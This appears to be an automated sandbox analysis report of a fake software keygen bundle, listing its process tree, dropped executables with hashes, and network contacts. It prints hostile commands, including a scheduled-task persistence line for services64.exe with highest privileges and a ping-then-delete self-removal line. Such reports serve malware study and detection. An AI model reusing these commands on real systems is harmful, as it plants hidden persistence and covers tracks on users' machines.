PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1356 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 208.95.112.1:80 ip-api.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 kvaka.li udp
GB 89.116.109.163:443 evaexpand.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
US 8.8.8.8:53 evaexpand.com udp
RU 186.2.171.3:443 186.2.171.3 tcp
GB 89.116.109.163:443 evaexpand.com tcp
UA 194.145.227.161:80 tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 qwertys.info udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 startupmart.bar udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.29:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 172.67.74.161:443 iplogger.org tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 oldhorse.info udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp

Files

memory/2252-0-0x0000000000250000-0x0000000000268000-memory.dmp

memory/2764-5-0x00000000002F0000-0x00000000003D5000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

MD5 51ef03c9257f2dd9b93bfdd74e96c017
SHA1 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34
SHA256 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf
SHA512 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

memory/2472-36-0x0000000000790000-0x0000000000875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat

MD5 12476321a502e943933e60cfb4429970
SHA1 c71d293b84d03153a1bd13c560fca0f8857a95a7
SHA256 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29
SHA512 f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

memory/1916-74-0x0000000000400000-0x0000000000983000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/1916-95-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-92-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-88-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-112-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-113-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-110-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-86-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-84-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-82-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-80-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-94-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1916-90-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-72-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-116-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-115-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1356-114-0x0000000000820000-0x00000000009F6000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/1572-143-0x000000013F210000-0x000000013F220000-memory.dmp

memory/936-144-0x0000000000F60000-0x0000000000F80000-memory.dmp

\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/2308-151-0x0000000000C80000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/936-160-0x0000000000140000-0x000000000015A000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/1708-185-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1708-184-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1708-183-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1688-187-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1708-182-0x0000000003F30000-0x0000000004197000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB9CD.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1916-197-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-208-0x0000000000400000-0x0000000000983000-memory.dmp

memory/1916-207-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarBB76.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat

MD5 b758f845efdd63b6937dd731211d0dd5
SHA1 96abfd8ef7a15cbaa81cf694db6046304fee6a5a
SHA256 528971a079ccdad72b96209f8a2455474c4054a0b7ea64a77750518acae1d2af
SHA512 fcada516d4c743bb7081435f950e1d28f1a00a214357019f82163c4f0acf78af8cb9a49d49267806496b3f62db180658cd8b18fd962e9fd1d7221641dd93920d

memory/316-214-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1688-216-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2376-215-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1572-221-0x0000000000770000-0x000000000077E000-memory.dmp

memory/1660-228-0x000000013F480000-0x000000013F490000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

memory/1688-230-0x0000000000400000-0x0000000000667000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/2088-263-0x00000000001C0000-0x00000000001DA000-memory.dmp

memory/2088-262-0x0000000000AE0000-0x0000000000AFE000-memory.dmp

memory/2728-250-0x0000000000400000-0x0000000002B4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

memory/2188-277-0x000000013FF60000-0x000000013FF66000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 72c72b745e67b994c15c559938b87494
SHA1 7d10a003de933173e76d777ea9c70712c270b2f3
SHA256 d483255eacab11d7ff2c5cf60adc981f666caeda902e2cce8ff01e37d5d30765
SHA512 5aa6d04d0acbbb2168dccb3cd9cfc7a5c429f259f773b5a08d0d0c305eef3f085172a7a72e08f81d076ac0e1e92d70d1b2af0450003d3dca73edb759598b6e0c

